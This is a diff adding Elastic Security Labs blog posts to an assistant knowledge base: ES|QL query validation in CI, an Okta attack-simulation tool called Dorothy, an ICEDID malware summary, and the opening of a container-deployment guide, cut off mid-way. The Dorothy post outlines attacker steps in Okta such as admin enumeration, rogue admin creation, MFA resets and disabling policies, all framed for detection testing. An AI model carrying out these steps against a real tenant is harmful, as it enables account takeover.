+## ES|QL warnings
+
+Not all fields will appear as errors, in which case you’re presented with warnings and a dropdown list. Hard failures (e.g. errors), imply that the rule cannot execute, whereas warnings indicate that the rule can run, but the functions may be degraded.  
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image6.png)
+
+When utilizing broad ES|QL queries that span multiple indices, such as `logs-* | limit 10`, there might be instances where certain fields fail to appear in the results. This is often due to the fields being undefined in the indexed data, or not yet supported by ES|QL. In cases where the expected fields are not retrieved, it's typically a sign that the data was ingested into Elasticsearch without these fields being indexed, as per the established mappings. Instead of causing the query to fail, ES|QL handles this by returning "null" for the unavailable fields, serving as a warning that something in the query did not execute as expected. This approach ensures the query still runs, distinguishing it from a hard failure, which occurs when the query cannot execute at all, such as when a non-existent field is referenced.  
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image12.png)
+
+There are also helpful performance warnings that may appear. Providing a `LIMIT` parameter to the query will help address performance warnings. Note this example highlights that there is a default limit of 500 events returned. This limit may significantly increase once this feature is generally available. 
+
+## Security 
+
+In an investigative workflow, security practitioners prefer to iteratively hunt for threats, which may encompass manually testing, refining, and tuning a query in the UI. Conveniently, security analysts and engineers can natively leverage ES|QL in timelines, with no need to interrupt workflows by pivoting back and forth to a different view in Kibana. You’ll receive the same errors and warnings in the same security component, which shows Elasticsearch feedback under the hood.
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image1.png)
+
+In some components, you will receive additional feedback based on the context of where ES|QL is implemented. One scenario is when you create an ES|QL rule using the create new rule feature under the Detection Rules (SIEM) tab.
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image8.png)
+
+For example, this query could easily be converted to an [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) or [KQL](https://www.elastic.co/guide/en/kibana/current/kuery-query.html) query as it does not leverage powerful features of ES|QL like statistics, frequency analysis, or parsing unstructured data. If you want to learn more about the benefits of queries using ES|QL check out this [blog by Costin](https://www.elastic.co/blog/elasticsearch-query-language-esql), which covers performance boosts. In this case, we must add `[metadata _id, _version, _index]` to the query, which informs the UI which components to return in the results.
+
+## API calls? Of course!
+
+Prior to this section, all of the examples referenced creating ES|QL queries and receiving feedback directly from the UI. For illustrative purposes, the following examples leverage Dev Tools, but these calls are easily migratable to cURL bash commands or the language / tool of your choice that can send an HTTP request.
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image4.png)
+
+Here is the same query as previously shown throughout other examples, sent via a POST request to the [query API](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-query-api.html) with a valid query.  
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image10.png)
+
+As expected, if you supply an invalid query, you’ll receive similar feedback observed in the UI. In this example, we’ve also supplied the `?error_trace` flag which can provide the stack trace if you need additional context for why the query failed validation. 
+
+As you can imagine, we can use the API to programmatically validate ES|QL queries. You can also still use the [Create rule](https://www.elastic.co/guide/en/kibana/current/create-rule-api.html) Kibana API, which requires a bit more metadata associated with a security rule. However, if you want to only validate a query, the `_query` API comes in handy. From here you can use the [Elasticsearch Python Client](https://www.elastic.co/guide/en/elasticsearch/client/python-api/current/index.html) to connect to your stack and validate queries.
+
+```
+from elasticsearch import Elasticsearch
+client = Elasticsearch(...)
+data = {
+"query": """
+    from logs-endpoint.events.*
+    | keep host.os.type, process.name, process.working_directory, event.type, event.action
+    | where host.os.type == "linux" and process.name == "unshadow" and event.type == "start"     and event.action in ("exec", "exec_event")
+"""
+}
+
+# Execute the query
+headers = {"Content-Type": "application/json", "Accept": "application/json"}
+response = client.perform_request(
+"POST", "/_query", params={"pretty": True}, headers=headers, body=data
+)
+```
+
+## Leverage the grammar
+
+One of the best parts of Elastic developing in the open is the [antlr ES|QL grammar](https://github.com/elastic/elasticsearch/tree/main/x-pack/plugin/esql/src/main/antlr) is also available.  
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image5.png)
+
+If you’re comfortable with [ANTLR](https://www.antlr.org), you can also download the latest JAR to build a lexer and parser.
+
+```
+pip install antlr4-tools # for antlr4
+git clone git@github.com:elastic/elasticsearch.git # large repo
+cd elasticsearch/x-pack/plugin/esql/src/main/antlr # navigate to grammar
+antlr4 -Dlanguage=Python3 -o build EsqlBaseLexer.g4 # generate lexer
+antlr4 -Dlanguage=Python3 -o build EsqlBaseParser.g4 # generate parser
+```
+
+This process will require more lifting to get ES|QL validation started, but you’ll at least have a tree object built, that provides more granular control and access to the parsed fields.
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image13.png)
+
+However, as you can see the listeners are stubs, which means you’ll need to build in semantics _manually_ if you want to go this route.
+
+## The security rule GitHub CI use case
+
+For our internal Elastic EQL and KQL query rule validation, we utilize the parsed abstract syntax tree (AST) objects of our queries to perform nuanced semantic validation across multiple stack versions. For example, having the AST allows us to validate proper field usage, verify new features are not used in older stack versions before being introduced, or even more, ensure related integrations are built based on datastreams used in the query. Fundamentally, local validation allows us to streamline a broader range of support for many stack features and versions. If you’re interested in seeing more of the design and rigorous validation that we can do with the AST, check out our [detection-rules repo](https://github.com/elastic/detection-rules/tree/main).
+   
+If you do not need granular access to the specific parsed tree objects and do not need to control the semantics of ES|QL validation, then out-of-the-box APIs may be all you need to validate queries. In this use case, we want to validate security detection rules using continuous integration. Managing detection rules through systems like GitHub helps garner all the benefits of using a version-controlled like tracking rule changes, receiving feedback via pull requests, and more. Conceptually, rule authors should be able to create these rules (which contain ES|QL queries) locally and exercise the git rule development lifecycle. 
+
+CI checks help to ensure queries still pass ES|QL validation without having to manually check the query in the UI. Based on the examples shown thus far, you have to either stand up a persistent stack and validate queries against the API, or build a parser implementation based on the available grammar outside of the Elastic stack. 
+
+One approach to using a short-lived Elastic stack versus leveraging a managed persistent stack is to use the [Elastic Container Project (ECP)](https://github.com/peasead/elastic-container). As advertised, this project will: 
+
+_Stand up a 100% containerized Elastic stack, TLS secured, with Elasticsearch, Kibana, Fleet, and the Detection Engine all pre-configured, enabled, and ready to use, within minutes._
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image11.png)
+
+With a combination of: 
+
+ - Elastic Containers (e.g. ECP)
+ - CI (e.g. Github Action Workflow)
+ - ES|QL rules
+ - Automation Foo (e.g. python & bash scripts)
+
+You can validate ES|QL rules via CI against the _latest stack version_ relatively easily, but there are some nuances involved in this approach.
+
+![](/assets/images/streamlining-esql-query-and-rule-validation/image2.gif)
+
+Feel free to check out the sample [GitHub action workflow](https://gist.github.com/Mikaayenson/7fa8f908ab7e8466178679a9a0cd9ecc) if you’re interested in a high-level overview of how it can be implemented.
+
+**Note:** if you're interested in using the GitHub action workflow, check out their documentation on using GitHub [secrets in Actions](https://docs.github.com/en/actions/security-guides/using-secrets-in-github-actions) and [setting up Action workflows](https://docs.github.com/en/actions/quickstart).
+
+## CI nuances
+
+ 1. Any custom configuration needs to be scripted away (e.g. setting up additional policies, [enrichments](https://www.elastic.co/guide/en/elasticsearch/reference/current/match-enrich-policy-type.html), etc.) In our POC, we created a step and bash script that executed a series of POST requests to our temporary CI Elastic Stack, which created the new enrichments used in our detection rules.
+
+```
+- name: Add Enrich Policy
+  env:
+    ELASTICSEARCH_SERVER: "https://localhost:9200"
+    ELASTICSEARCH_USERNAME: "elastic"
+    ELASTICSEARCH_PASSWORD: "${{ secrets.PASSWORD }}"
+  run: |
+    set -x
+    chmod +x ./add_enrich.sh
+    bash ./add_enrich.sh
+```
+
+ 2. Without data in our freshly deployed CI Elastic stack, there will be many `Unknown Column` issues as previously mentioned. One approach to address this is to build indices with the proper mappings for the queries to match. For example, if you have a query that searches the index `logs-endpoint.events.*`, then create an index called `logs-endpoint.events.ci`, with the proper mappings from the integration used in the query.  
+ 
+ 3. Once the temporary stack is configured, you’ll need extra logic to iterate over all the rules and validate using the `_query` API. For example, you can create a unit test that iterates over all the rules. We do this today by leveraging our default `RuleCollection.default()` that loads all rules, in our detection-rules repo, but here is a snippet that quickly loads only ES|QL rules.
+ 
+
+```
+# tests/test_all_rules.py
+class TestESQLRules:
+    """Test ESQL Rules."""
+
+    @unittest.skipIf(not os.environ.get("DR_VALIDATE_ESQL"),
+         "Test only run when DR_VALIDATE_ESQL environment variable set.")
+    def test_environment_variables_set(self):
+        collection = RuleCollection()
+
+        # Iterate over all .toml files in the given directory recursively
+        for rule in Path(DEFAULT_RULES_DIR).rglob('*.toml'):
+            # Read file content
+            content = rule.read_text(encoding='utf-8')
+            # Search for the pattern
+            if re.search(r'language = "esql"', content):
+                print(f"Validating {str(rule)}")
+                collection.load_file(rule)
+```
+
+ Each rule would run through a validator method once the file is loaded with `load_file`. 
+
+```
+# detection_rules/rule_validator.py
+class ESQLValidator(QueryValidator):
+    """Specific fields for ESQL query event types."""
+
+    def validate(self, data: 'QueryRuleData', meta: RuleMeta) -> None:
+        """Validate an ESQL query while checking TOMLRule."""
+        if not os.environ.get("DR_VALIDATE_ESQL"):
+            return
+
+        if Version.parse(meta.min_stack_version) < Version.parse("8.11.0"):
+            raise ValidationError(f"Rule minstack must be greater than 8.10.0 {data.rule_id}")
+
+        client = Elasticsearch(...)
+        client.info()
+        client.perform_request("POST", "/_query", params={"pretty": True},
+                               headers={"accept": "application/json", 
+                                        "content-type": "application/json"},
+                               body={"query": f"{self.query} | LIMIT 0"})
+```
+
+  As highlighted earlier, we can `POST` to the query API and validate given the credentials that were set as GitHub action secrets and passed to the validation as environment variables.  Note, the `LIMIT 0` is so the query does not return data intentionally. It’s meant to only perform validation.  Finally the single CI step would be a bash call to run the unit tests (e.g. `pytest tests/test_all_rules.py::TestESQLRules`). 
+
+ 4. Finally, CI leveraging containers may not scale well when validating many rules against multiple Elastic stack versions and configurations. Especially if you would like to test on a commit-basis. The time to deploy one stack took slightly over five minutes to complete. This measurement could greatly increase or decrease depending on your CI setup.   
+ 
+## Conclusion
+
+Elasticsearch's new feature, Elasticsearch Query Language (ES|QL), is a specialized query and compute engine for Elasticsearch, now in technical preview. It offers seamless integration across various Elastic services like Kibana and Timelines, with validation options for ES|QL queries. Users can validate queries through the Elastic Stack UI or API calls, receiving immediate feedback on syntax or column errors. 
+
+Additionally, ES|QL's ANTLR grammar is [available](https://github.com/elastic/elasticsearch/tree/d5f5d0908ff7d1bfb3978e4c57aa6ff517f6ed29/x-pack/plugin/esql/src/main/antlr) for those who prefer a more hands-on approach to building lexers and parsers. We’re exploring ways to validate ES|QL queries in an automated fashion and now it’s your turn. Just know that we’re not done exploring, so check out ES|QL and let us know if you have ideas! We’d love to hear how you plan to use it within the stack natively or in CI.
+
+We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80).
+
+Check out these additional resources to learn more about how we’re bringing the latest AI capabilities to the hands of the analyst:
+Learn everything [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) 
+Checkout the 8.11.0 release blog [introducing ES|QL](https://www.elastic.co/blog/whats-new-elasticsearch-platform-8-11-0)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/testing_okta_visibility_and_detection_dorothy.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/testing_okta_visibility_and_detection_dorothy.md
new file mode 100644
index 0000000000000..3943b671a591c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/testing_okta_visibility_and_detection_dorothy.md
@@ -0,0 +1,123 @@
+---
+title: "Testing your Okta visibility and detection with Dorothy and Elastic Security"
+slug: "testing-okta-visibility-and-detection-dorothy"
+date: "2022-06-02"
+description: "Dorothy is a tool for security teams to test their visibility and detection capabilities for their Okta environment. IAM solutions are frequently targeted by adversaries but poorly monitored. Learn how to get started with Dorothy in this post."
+author:
+  - slug: david-french
+image: "blog-thumb-dorothy-cow.jpg"
+category:
+  - slug: security-research
+---
+
+When approached by stakeholders in their organization, few security teams can confidently demonstrate that logging and alerting capabilities are working as expected. Organizations have become more distributed and reliant on cloud offerings for use cases such as identity and access management, user productivity, and file storage. Meanwhile, adversaries have extended their operational capabilities in cloud environments. It is crucial that security teams are able to monitor these systems for abuse in order to protect their organization’s data from attack.
+
+[Dorothy](https://github.com/elastic/dorothy) is a free and open tool to help security teams test their visibility, monitoring, and detection capabilities for Okta Single Sign-On (SSO) environments. We’ll demonstrate how Dorothy can be used to execute tests and how [Elastic Security](https://www.elastic.co/security) can be used to alert on relevant and suspicious behavior using our [free and open detection rules](https://github.com/elastic/detection-rules/).
+
+## What is Okta SSO?
+
+For those who aren’t familiar, [Okta SSO](https://www.okta.com/products/single-sign-on/) is a cloud-based identity management solution that allows users to authenticate to a variety of systems and applications within their organization using a single user account. Informing end users that they only have to remember _one_ username and password instead of ten or more reduces the risk that they’ll develop poor password hygiene and enables system administrators to enforce stronger password policies. Further, multi-factor authentication (MFA) policies can be configured in Okta, which raises the barrier to entry for attackers. Many attackers will simply move on and look for an easier target when they discover that MFA is enforced in their target’s network or user account.
+
+While SSO solutions can provide a convenient user experience and reduce cybersecurity risk for an organization, these centralized systems offer a type of skeleton key to many systems and applications, and are often an attractive target for attackers. It’s critical that security teams understand what normal behavior looks like in their Okta environment so that they can identify suspicious activity more easily.
+
+## Meet Dorothy
+
+[Dorothy](https://github.com/elastic/dorothy) has 25+ modules to simulate actions an attacker may take while operating in an Okta environment and behavior that security teams should monitor for, detect, and alert on. All modules are mapped to the relevant [MITRE ATT&CK®](https://attack.mitre.org/) tactics, such as Persistence, Defense Evasion, Discovery, and Impact.
+
+![Figure 1 - Starting Dorothy and listing its modules](/assets/images/testing-okta-visibility-and-detection-dorothy/1-Dorothy-blog-listing-modules.png)
+
+Dorothy was created to help defenders test their security visibility and controls, and does not provide any modules to obtain initial access or escalate privileges in an Okta environment. To execute actions using Dorothy, a valid Okta API token is required that is linked to a user with one or more administrator roles assigned.
+
+A user-friendly shell interface with contextual help is provided for navigation between menus and modules, helping guide the user through simulated intruder scenarios. Other features include configuration profiles to manage connections to individual Okta environments and detailed logging with the option of indexing events into Elasticsearch to provide an audit trail of the actions that were executed using Dorothy.
+
+## Executing actions in an Okta environment using Dorothy
+
+In this section, we demonstrate how to execute some of Dorothy’s modules in an Okta environment. Figure 2 below shows the typical workflow for an Elastic Security user. After this demonstration, you should be comfortable with heading over to Dorothy’s GitHub repository and following the “Getting Started” steps in the project’s [wiki](https://github.com/elastic/dorothy/wiki).
+
+![Figure 2 - Example workflow for executing actions in an Okta environment using Dorothy](/assets/images/testing-okta-visibility-and-detection-dorothy/2-Dorothy-blog-example_workflow.png)
+
+### whoami?
+
+Let’s put ourselves in an attacker's shoes and think about what actions they might take while operating in an Okta environment. As an attacker with an initial foothold, the first questions I'll have are about the user for which I have an API token. Let's simulate this attacker action through Dorothy's whoami command to look at the associated user’s login ID, last login time, and last password change.
+
+Now that we have a better understanding of the user account we have control of, we’ll list Dorothy’s modules and check out the help menu before making our next move.
+
+<Video vidyard_uuid="iG2cr4pHfUSwwVyk3paivS" />
+
+_Figure 3 - Executing Dorothy’s whoami and list-modules commands_
+
+### Discovery
+
+Dorothy has several discovery modules we can use to simulate the knowledge an attacker might obtain about an Okta environment. Adversaries will often spend time to learn details of an environment after obtaining initial access — details that are essential for orienting themselves before planning their next steps.
+
+Let’s try and gain some knowledge about the Okta environment by harvesting the following information:
+
+- Users - A list of names, login IDs, email addresses, password recovery questions, and the status of each user will be useful when choosing which accounts to take control of, modify, or leave intact to avoid detection
+- Policies - [Okta policies](https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm) are used to control elements of security, including password complexity and MFA requirements, as well as the devices that users are permitted to use. This knowledge will come in handy if we decide to weaken some components of the target’s security configuration
+- Zones - [Network zones](https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm) can be used to define security perimeters for an Okta environment. Similar to policies, this information helps us learn how the environment is configured and make informed decisions before implementing any changes on how traffic is allowed or blocked
+
+Finally, we’ll execute the find-admins module to enumerate the roles of each Okta user and identify which users have one or more administrator roles assigned to them.
+
+<Video vidyard_uuid="TkDuAJQwKabkyj375rfYPe" />
+
+_Figure 4 - Executing Dorothy’s “discovery” modules to gain knowledge about the Okta environment_
+
+Other discovery modules to help with information gathering tasks include find-users-without-mfa to find users who may authenticate using only a username and password and find-admin-groups to identify user groups that have one or more administrator roles assigned to them.
+
+### Persistence
+
+Once an attacker has obtained access to their target environment, they may look for opportunities to establish persistence. Persistence helps an attacker maintain access in the event that they lose their initial foothold. A common example of how an adversary might lose their access is when the security team detects their presence and disables the compromised user account that the attacker is utilizing or blocks their communications at the network perimeter.
+
+Having one or more persistence mechanisms in place means that the attacker will be able to continue their mission if one of their pathways is blocked or interrupted. In this example, we’ll use Dorothy's create-user and create-admin-user modules to create an Okta user and [assign an administrator role](https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_administrator_role_assigned_to_okta_user.toml) to the new user. Next, we'll create a recovery question for another Okta user so that we can go through the process of resetting the password for that user and take control of their account as another method of persistence.
+
+<Video vidyard_uuid="GBE6rQG2gxPGLhysSSTZet" />
+
+Dorothy has other persistence modules to help us understand the steps an attacker might take, such as reset-factors to [remove a user's enrolled authentication factors](https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml) and reset-password to generate a one-time link to reset a user's password.
+
+### Defense Evasion
+
+Adversaries will attempt to execute defense evasion techniques to avoid detection throughout their mission. For example, an attacker may attempt to disable security logging to render the security team blind to their nefarious actions.
+
+At this point, we’ve gained knowledge about the environment and configured a couple of forms of persistence. Let’s execute Dorothy's [change-policy-state](https://github.com/elastic/detection-rules/blob/main/rules/okta/okta_attempt_to_deactivate_okta_policy.toml) and [change-zone-state](https://github.com/elastic/detection-rules/blob/main/rules/okta/attempt_to_deactivate_okta_network_zone.toml) modules to weaken the “target's” security controls.
+
+<Video vidyard_uuid="ibEzpdD2KPKKK83d3n556d" />
+
+_Figure 6 - Deactivating Okta policy and network zone objects_
+
+Other defense evasion-themed modules can activate, deactivate, or modify other Okta objects such as applications and individual policy rules.
+
+We’ll stop our fictitious attack scenario here, but if you’re curious to learn what else Dorothy can do, head over to the [GitHub repository](https://github.com/elastic/dorothy).
+
+## Detecting suspicious behavior with Elastic Security
+
+In this section, we'll demonstrate how Okta's [system log](https://help.okta.com/en/prod/Content/Topics/Reports/Reports_SysLog.htm) powers our free detection rules to monitor for and alert teams to suspicious behavior.
+
+Okta's system log provides an audit trail of activity that was observed in an organization's environment. This includes activity such as users logging in or changing their password, administrators making configuration changes, and much more. This data source is incredibly useful for security monitoring, investigations, compliance, and response activities.
+
+### Ingesting Okta system logs with Fleet
+
+[Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) provides a web-based UI in Kibana to add and manage integrations for popular services and platforms including Okta, AWS, Azure, Google Cloud Platform, Google Workspace, and many others. Fleet’s Okta integration provides an easy way to ingest and normalize Okta’s system log events.
+
+![Figure 7 - Reviewing Fleet’s Okta integration in Kibana](/assets/images/testing-okta-visibility-and-detection-dorothy/7-Dorothy-blog-reviewing-fleet.png)
+
+An [Okta Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html) is also available for teams that already use Beats.
+
+### Detecting suspicious behavior with Elastic Security’s free detection rules
+
+The Elastic Security Protections Team researches adversary tradecraft in order to develop detections and preventions for endpoint, cloud, and network platforms. Our [detection rules](https://github.com/elastic/detection-rules) are free and developed in the open alongside the broader security community.
+
+Our Okta rules utilize the indexed system log events that are normalized into [Elastic Common Schema (ECS)](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) and alert security teams to relevant and suspicious behavior.
+
+Figure 8 below shows a number of alerts in Elastic Security after Dorothy was used to simulate actions that an attacker might take while operating in an Okta environment.
+
+![Figure 8 - Reviewing open alerts in Elastic Security](/assets/images/testing-okta-visibility-and-detection-dorothy/8-Dorothy-blog-reviewing-alerts.png)
+
+What about those pesky false positives? Adding exceptions to rules in Elastic Security to filter routine and expected behavior is straightforward. This feature includes an option to close all alerts that match the exception to save you time.
+
+![Figure 9 - Adding an exception to an Okta rule in Elastic Security](/assets/images/testing-okta-visibility-and-detection-dorothy/9-Dorothy-blog-adding_exception.jpg)
+
+## Measure your cloud cover with Dorothy
+
+Okta and other identity management solutions are frequently targeted by adversaries, but are often poorly monitored, if at all. We created Dorothy as a tool to help security teams understand how adversaries can operate within Okta environments, further empowering them to test their visibility and efficacy of our free and open detection rules.
+
+You can learn how to get started with Dorothy by visiting the project’s [wiki](https://github.com/elastic/dorothy/wiki). If you're not already an Elastic Security user, you can sign up for a [free cloud trial](https://www.elastic.co/cloud/) today and check out our free [detection rules](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/thawing_the_permafrost_of_icedid_summary.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/thawing_the_permafrost_of_icedid_summary.md
new file mode 100644
index 0000000000000..ee8a6baed7ae6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/thawing_the_permafrost_of_icedid_summary.md
@@ -0,0 +1,62 @@
+---
+title: "Thawing the permafrost of ICEDID Summary"
+slug: "thawing-the-permafrost-of-icedid-summary"
+date: "2023-03-21"
+subtitle: "Elastic Security Labs details a recent ICEDID GZip variant"
+description: "Elastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, capabilities, and design."
+author:
+  - slug: cyril-francois
+  - slug: daniel-stepanic
+image: "blog-thumb-tree-icicles.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - malware analysis
+  - icedid
+---
+
+ICEDID is a malware family first [described](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/) in 2017 by IBM X-force researchers and is associated with the theft of login credentials, banking information, and other personal information. ICEDID has always been a prevalent family, but has achieved even more growth since EMOTET’s temporary [disruption](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation) in early 2021. ICEDID has been linked to the distribution of other distinct malware families including [DarkVNC](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc) and [COBALT STRIKE](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot). Regular industry reporting, including research publications like this one, help mitigate this threat.
+
+Elastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, highlight its capabilities, and deliver insights about how it is designed.
+
+### Execution Chain
+
+ICEDID employs multiple stages before establishing persistence via a scheduled task and may retrieve components from C2 dynamically. The following diagram illustrates major phases of the ICEDID execution chain.
+
+![ICEDID attack chain](/assets/images/thawing-the-permafrost-of-icedid-summary/image1.jpg)
+
+### Research Paper Overview
+
+Elastic Security Labs described the full execution chain of a recent ICEDID sample in a detailed research [paper](https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf) hosted at Elastic Security Labs. In addition, we provide a comprehensive analysis of this malware sample and capabilities, including: - Virtualization detection and anti-analysis - C2 polling operations - Shellcode execution methods - Credential access mechanisms - Websocket connections - Installing a web browser proxy to capture all user traffic - Reverse shell and VNC server installation - Certificate pinning - Data validation - ICEDID observable TTPs - Links to useful resources from Elastic
+
+### Detections and preventions
+
+#### Detection logic
+
+- [Enumeration of Administrator Accounts](https://www.elastic.co/guide/en/security/current/enumeration-of-administrator-accounts.html)
+- [Command Shell Activity Started via RunDLL32](https://www.elastic.co/guide/en/security/current/command-shell-activity-started-via-rundll32.html)
+- [Security Software Discovery using WMIC](https://www.elastic.co/guide/en/security/current/security-software-discovery-using-wmic.html)
+- [Suspicious Execution from a Mounted Device](https://www.elastic.co/guide/en/security/current/suspicious-execution-from-a-mounted-device.html)
+- [Windows Network Enumeration](https://www.elastic.co/guide/en/security/current/windows-network-enumeration.html)
+- [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)
+- [Suspicious Windows Script Interpreter Child Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_windows_script_interpreter_child_process.toml)
+- [RunDLL32 with Unusual Arguments](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_with_unusual_arguments.toml)
+
+#### Preventions (source: [https://github.com/elastic/protections-artifacts/](https://github.com/elastic/protections-artifacts/))
+
+- Malicious Behavior Detection Alert: Command Shell Activity
+- Memory Threat Detection Alert: Shellcode Injection
+- Malicious Behavior Detection Alert: Unusual DLL Extension Loaded by Rundll32 or Regsvr32
+- Malicious Behavior Detection Alert: Suspicious Windows Script Interpreter Child Process
+- Malicious Behavior Detection Alert: RunDLL32 with Unusual Arguments
+- Malicious Behavior Detection Alert: Windows Script Execution from Archive File
+
+#### YARA
+
+Elastic Security has created multiple YARA rules related to the different stages/components within ICEDID infection, these can be found in the signature linked below: - [Windows.Trojan.ICEDID](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_IcedID.yar)
+
+---
+
+Elastic Security Labs is a team of dedicated researchers and security engineers focused on disrupting adversaries though the publication of detailed detection logic, protections, and applied threat research.
+
+Follow us on @elasticseclabs or visit our research portal for more resources and research.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/the_elastic_container_project.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/the_elastic_container_project.md
new file mode 100644
index 0000000000000..9a0d624e206e3
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/the_elastic_container_project.md
@@ -0,0 +1,517 @@
+---
+title: "The Elastic Container Project for Security Research"
+slug: "the-elastic-container-project"
+date: "2023-03-01"
+subtitle: "Using Docker to stand up the Elastic Stack"
+description: "The Elastic Container Project provides a single shell script that will allow you to stand up and manage an entire Elastic Stack using Docker. This open source project enables rapid deployment for testing use cases."
+author:
+  - slug: andrew-pease
+  - slug: colson-wilhoit
+  - slug: derek-ditch
+image: "blog-thumb-container-barge.jpg"
+category:
+  - slug: security-operations
+  - slug: detection-science
+---
+
+## Preamble
+
+The Elastic Stack is a modular data analysis ecosystem. While this allows for engineering flexibility, it can be cumbersome to stand up a development instance for testing. The easiest way to stand up the Elastic Stack, is to use [Elastic Cloud](https://cloud.elastic.co) - it’s completely turnkey. However, there could be situations where Elastic Cloud won’t work for your testing environment. To help with this, this blog will provide you with the necessary information required in order to quickly and painlessly stand up a local, fully containerized, TLS-secured, Elastic Stack with Fleet and the Detection Engine enabled. You will be able to create a Fleet policy, install an Elastic Agent on a local host or VM, and send the data into your stack for monitoring or analysis.
+
+This blog will cover the following:
+
+- The Elastic Stack
+- The Elastic Container project
+- How to use the Elastic Container project
+- How to navigate Kibana and use its related features for security research
+
+> The Elastic Container Project is not sponsored or maintained by the company, Elastic. Design and implementation considerations for the project may not reflect Elastic’s guidance on deploying a production-ready stack.
+
+## The Elastic Stack
+
+The Elastic Stack is made up of several different components, each of which provide a distinct capability that can be utilized across a wide variety of use cases.
+
+### Elasticsearch
+
+Elasticsearch is a distributed, RESTful search and analytics engine. As the heart of the Elastic Stack, it centrally stores your data for lightning-fast search, fine-tuned relevancy, and powerful analytics that scale with ease.
+
+### Kibana
+
+Kibana is the user interface that lets you visualize your Elasticsearch data and manage the Elastic Stack.
+
+### The Elastic Agent
+
+The Elastic Agent is the modular agent that allows you to collect data from an endpoint or act as a vehicle to ship data from 3rd party sources, like threat feeds. The Elastic Security integration for endpoints prevents ransomware and malware, detects advanced threats, and arms responders with vital investigative context.
+
+## The Elastic Container Project
+
+![The Elastic Container Project](/assets/images/the-elastic-container-project/elastic-container.png)
+
+As mentioned above, the Elastic Stack is modular which makes it very flexible for a wide variety of use cases but this can add complexity to the implementation.
+
+The Elastic Container project is an open source project that uses Docker Compose as a way to stand up a fully-functional Elastic Stack for use in non-production environments. This project is not sponsored or maintained by the Elastic company.
+
+### Introduction
+
+The [Elastic Container Project](https://github.com/peasead/elastic-container) includes three main components:
+
+- Elasticsearch
+- Kibana
+- the Elastic Agent
+
+The project leverages [Docker Compose](https://docs.docker.com/compose/), which is a tool to build, integrate, and manage multiple Docker containers.
+
+To simplify the management of the containers, the project includes a shell script that allows for the staging, starting, stopping, and destroying of the containers.
+
+Additionally, the project makes use of self-signed TLS certificates between Elasticsearch and Kibana, Kibana and your web browser, the Elastic Agent and Elasticsearch, and the Elastic Agent and Kibana.
+
+### Prerequisites
+
+The project was built and tested on Linux and macOS operating systems. If you are using Windows, you’ll not be able to use the included shell script, but you can still run native Docker Compose commands and manually perform post-deployment steps.
+
+While not thoroughly tested, it is recommended that you contribute 4 cores and 8 GB of RAM to Docker.
+
+There are only a few packages you need to install:
+
+- Docker
+- Docker Compose
+- jq
+- Git
+- cURL
+
+#### macOS
+
+If you’re running on macOS, you can install the prerequisites using [Homebrew](https://brew.sh/), which is an open-source package management system for macOS. Check out the Homebrew site for information on installing it if needed.
+
+```
+**brew install jq git**
+**brew install --cask docker**
+```
+
+#### Linux
+
+If you’re running on Linux, you can install the prerequisites using your package management system ( **DNF** , **Yum** , or **APT** ).
+
+**RPM-based distributions**
+
+```
+**dnf install jq git curl**
+```
+
+**Ubuntu**
+
+```
+**apt-get install jq git curl**
+```
+
+You'll also need the Docker suite (including the **docker-compose-plugin** ). Check out Docker's [installation instructions](https://docs.docker.com/engine/install/) for your OS'
+
+### Cloning the project repository
+
+The Elastic Container project is stored on Github. As long as you have Git installed, you can collect it from your CLI of choice.
+
+```
